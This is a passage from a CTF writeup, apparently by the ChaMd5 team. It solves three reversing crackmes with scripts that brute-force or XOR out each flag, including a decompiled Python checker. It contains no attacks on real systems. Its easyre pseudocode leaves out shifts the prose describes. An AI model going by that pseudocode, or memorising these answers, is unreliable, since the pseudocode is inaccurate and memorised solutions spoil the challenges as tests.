     0x000085d3, 0x00002204, 0x0000c2ee, 0x0000e07f,
     0x00000caf, 0x0000bf76, 0x000063fe, 0x0000bffb,
     0x00004b09, 0x0000e5b3, 0x00008bda, 0x000096df,
     0x0000866d, 0x00001719, 0x00006bcf, 0x0000adcc,
     0x00000f2b, 0x000051ce, 0x00001549, 0x000020c1,
     0x00003a8d, 0x000005f5, 0x00005403, 0x00001125,
     0x00009161, 0x0000e2a5, 0x00005196, 0x0000d8d2,
     0x0000d644, 0x0000ee86, 0x00003896, 0x00002e71,
     0x0000a6f1, 0x0000dfcf, 0x00003ece, 0x00007d49,
     0x0000c24d, 0x0000237e, 0x00009352, 0x00007a97,
     0x00007bfa, 0x0000cbaa, 0x000010dc, 0x00003bd9,
     0x00007d7b, 0x00003b88, 0x0000b0d0, 0x0000e8bc]
b = [0x08a73233, 0x116db0f6, 0x0e654937, 0x03c374a7,
     0x16bc8ed9, 0x0846b755, 0x08949f47, 0x04a13c27,
     0x0976cf0a, 0x07461189, 0x1e1a5c12, 0x11e64d96,
     0x03cf09b3, 0x093cb610, 0x0d41ea64, 0x07648050,
     0x092039bf, 0x08e7f1f7, 0x004d871f, 0x1680f823,
     0x06f3c3eb, 0x2205134d, 0x015c6a7c, 0x11c67ed0,
     0x0817b32e, 0x06bd9b92, 0x08806b0c, 0x06aaa515,
     0x205b9f76, 0x0de963e9, 0x2194e8e2, 0x047593bc]
# each flag character j must satisfy a[i]*j*j + a[i+32]*j + a[i+64] == b[i];
# the (x<<2)//4 indexing mirrors the byte offsets seen in the disassembly
for i in range(32):
    for j in range(32, 127):
        temp = j*j*a[(i<<2)//4] + a[((i+32)<<2)//4]*j + a[((i+64) << 2)//4]
        if temp == b[i]:
            print(chr(j), end='')
            break

easyre

Approach

Loading this into IDA shows that main contains no check of the flag itself, only a check on its length, which must be 0x18. After that it returns to the calling function. Instead of digging further in IDA, I used OllyDbg to debug it dynamically.

Following along after main returns, there is an encryption routine. It first stores (first character & 0xe0) on the stack. Then each character is shifted left by 3 bits, the next character is shifted right by 5 bits, and the two are OR'ed together, then XOR'ed with the loop variable, i.e. the array index. Roughly, the pseudocode is (((input[i])|(input[i+1]))&0xff)^i. Finally the value saved on the stack is combined with the last byte.

Another ret brings us to the check, where the encrypted flag data can be found.

Bit operations are not reversible by themselves and my algorithm skills are not great, so I brute-forced it head on. Each position's expression can be treated as a constraint; shifts and ORs necessarily have multiple solutions, and only values satisfying all constraints pin down the unique flag. After several attempts I found that the possible values for each position are actually quite limited, and under the constraints of the neighbouring positions they become fixed, so the brute force can be done segment by segment. (No art to it; quick and dirty gets first blood.) I only give a partial screenshot of the code, not all of it; everyone's brute-force code is different.
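An added example, not the writeup's own script, that implements the transform as the text describes it (assumed reading: each byte shifted left by 3, OR'ed with the next byte shifted right by 5, the last byte borrowing the saved top bits of the first, then XOR'ed with the index) together with the segmented brute force: every output byte constrains one neighbouring pair, and pruning the candidate sets until they stop shrinking leaves one printable byte per position. The flag value is constructed.

```python
PRINTABLE = range(0x20, 0x7f)
FLAG = b"flag{constructed_test12}"     # constructed; 0x18 bytes like the challenge


def encrypt(plain):
    """Transform as the writeup describes it (assumed reading of the
    disassembly): byte i shifted left by 3, OR'ed with the top 3 bits of
    byte i+1, masked to 8 bits and XOR'ed with the index i. The saved
    (input[0] & 0xe0) >> 5 supplies the top bits for the last byte, which
    is the same as letting the index wrap around."""
    n = len(plain)
    out = bytearray(n)
    for i in range(n):
        nxt = plain[(i + 1) % n]
        out[i] = (((plain[i] << 3) | (nxt >> 5)) & 0xff) ^ i
    return bytes(out)


def fits(i, x, y, cipher):
    """Does the pair (p[i], p[i+1]) = (x, y) reproduce cipher[i]?"""
    return ((((x << 3) | (y >> 5)) & 0xff) ^ i) == cipher[i]


def recover(cipher):
    """Segmented brute force: every output byte only constrains the pair
    (p[i], p[i+1]). Start with all printable candidates per position and
    prune each set against its neighbours until nothing changes; each pair
    fixes the low 5 bits of p[i] and the top 3 bits of p[i+1], so the sets
    collapse to one byte per position."""
    n = len(cipher)
    cand = [set(PRINTABLE) for _ in range(n)]
    changed = True
    while changed:
        changed = False
        for i in range(n):
            j = (i + 1) % n
            xs = {x for x in cand[i] if any(fits(i, x, y, cipher) for y in cand[j])}
            ys = {y for y in cand[j] if any(fits(i, x, y, cipher) for x in cand[i])}
            if xs != cand[i] or ys != cand[j]:
                cand[i], cand[j] = xs, ys
                changed = True
    if any(len(c) != 1 for c in cand):
        return None          # inconsistent data or no printable solution
    return bytes(next(iter(c)) for c in cand)


if __name__ == "__main__":
    enc = encrypt(FLAG)
    print(enc.hex())
    print(recover(enc))
```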

ReMe

Approach

This one is mainly about Python decompilation; the exe -> pyc -> py process is easy to look up, so I will not go into it. The decompiled code:

# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)
# [GCC 8.2.0]
# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.
# Embedded file name: ReMe.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import sys, hashlib
check = ['e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67',
         'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0',
         'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8',
         '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f',
         '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84',
         '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe',
         'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878',
         '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe',
         'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d',
         '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7',
         '874992ac91866ce1430687aa9f7121fc']

def func(num):
    # Collatz sequence of the character code, excluding the start value
    result = []
    while num != 1:
        num = num * 3 + 1 if num % 2 else num // 2
        result.append(num)
    return result

if __name__ == '__main__':
    print('Your input is not the FLAG!')
    inp = input()
    if len(inp) != 27:
        print('length error!')
        sys.exit(-1)
    for i, ch in enumerate(inp):
        ret_list = func(ord(ch))
        # interleave the sequence with its reverse, then hash it
        s = ''
        for idx in range(len(ret_list)):
            s += str(ret_list[idx])
            s += str(ret_list[(len(ret_list) - idx - 1)])
        md5 = hashlib.md5()
        md5.update(s.encode('utf-8'))
        if md5.hexdigest() != check[i]:
            sys.exit(i)
    md5 = hashlib.md5()
    md5.update(inp.encode('utf-8'))
    print('You win!')
    print('flag{' + md5.hexdigest() + '}')
# okay decompiling 2.pyc

A slight modification of the source makes it print the flag by itself: since each character is checked independently against its own hash, try every printable character per position.

# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 2.7.15+ (default, Aug 31 2018, 11:56:52)
# [GCC 8.2.0]
# Warning: this version of Python has problems handling the Python 3 "byte" type in constants properly.
# Embedded file name: ReMe.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import sys, hashlib
check = ['e5438e78ec1de10a2693f9cffb930d23', '08e8e8855af8ea652df54845d21b9d67',
         'a905095f0d801abd5865d649a646b397', 'bac8510b0902185146c838cdf8ead8e0',
         'f26f009a6dc171e0ca7a4a770fecd326', 'cffd0b9d37e7187483dc8dd19f4a8fa8',
         '4cb467175ab6763a9867b9ed694a2780', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'cffd0b9d37e7187483dc8dd19f4a8fa8', 'fd311e9877c3db59027597352999e91f',
         '49733de19d912d4ad559736b1ae418a7', '7fb523b42413495cc4e610456d1f1c84',
         '8e50684ac9ef90dfdc6b2e75f2e23741', 'acb465dc618e6754de2193bf0410aafe',
         'bc52c927138231e29e0b05419e741902', '515b7eceeb8f22b53575afec4123e878',
         '451660d67c64da6de6fadc66079e1d8a', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'fe86104ce1853cb140b7ec0412d93837', 'acb465dc618e6754de2193bf0410aafe',
         'c2bab7ea31577b955e2c2cac680fb2f4', '8e50684ac9ef90dfdc6b2e75f2e23741',
         'f077b3a47c09b44d7077877a5aff3699', '620741f57e7fafe43216d6aa51666f1d',
         '9e3b206e50925792c3234036de6a25ab', '49733de19d912d4ad559736b1ae418a7',
         '874992ac91866ce1430687aa9f7121fc']

def func(num):
    result = []
    while num != 1:
        num = num * 3 + 1 if num % 2 else num // 2
        result.append(num)
    return result

if __name__ == '__main__':
    flag = ''
    '''
    print('Your input is not the FLAG!')
    inp = input()
    if len(inp) != 27:
        print('length error!')
        sys.exit(-1)
    for i, ch in enumerate(inp):
    '''
    # brute-force each position on its own: the check is per character
    for i in range(len(check)):
        for ch in range(32, 128):
            ret_list = func(ch)
            s = ''
            for idx in range(len(ret_list)):
                s += str(ret_list[idx])
                s += str(ret_list[(len(ret_list) - idx - 1)])
            md5 = hashlib.md5()
            md5.update(s.encode('utf-8'))
            if md5.hexdigest() == check[i]:
                flag += chr(ch)
    print(flag)
    '''
    md5 = hashlib.md5()
    md5.update(inp.encode('utf-8'))
    print('You win!')
    print('flag{' + md5.hexdigest() + '}')
    '''
# okay decompiling 2.pyc

easy_c++

A warm-up, the most basic reversing.

Here you can see the three key parts, the usual ones: the ciphertext, the encryption algorithm, and the comparison; the algorithm is just the most basic XOR. Straight to the script:

>>> a = '7d21e...'   (ciphertext literal truncated in the original)
>>> flag = ''
>>> for i in range(len(a)):
...     flag += chr(ord(a[i])^i)
...
>>> flag
'7e02a9c4439056df0e2a7b432b0069b3'

end

The ChaMd5 CTF team is recruiting year-round,

especially crypto, reverse, pwn and smart-contract experts.

This article was first published on the WeChat official account (ChaMd5 Security Team): 湖湘杯-WriteUp
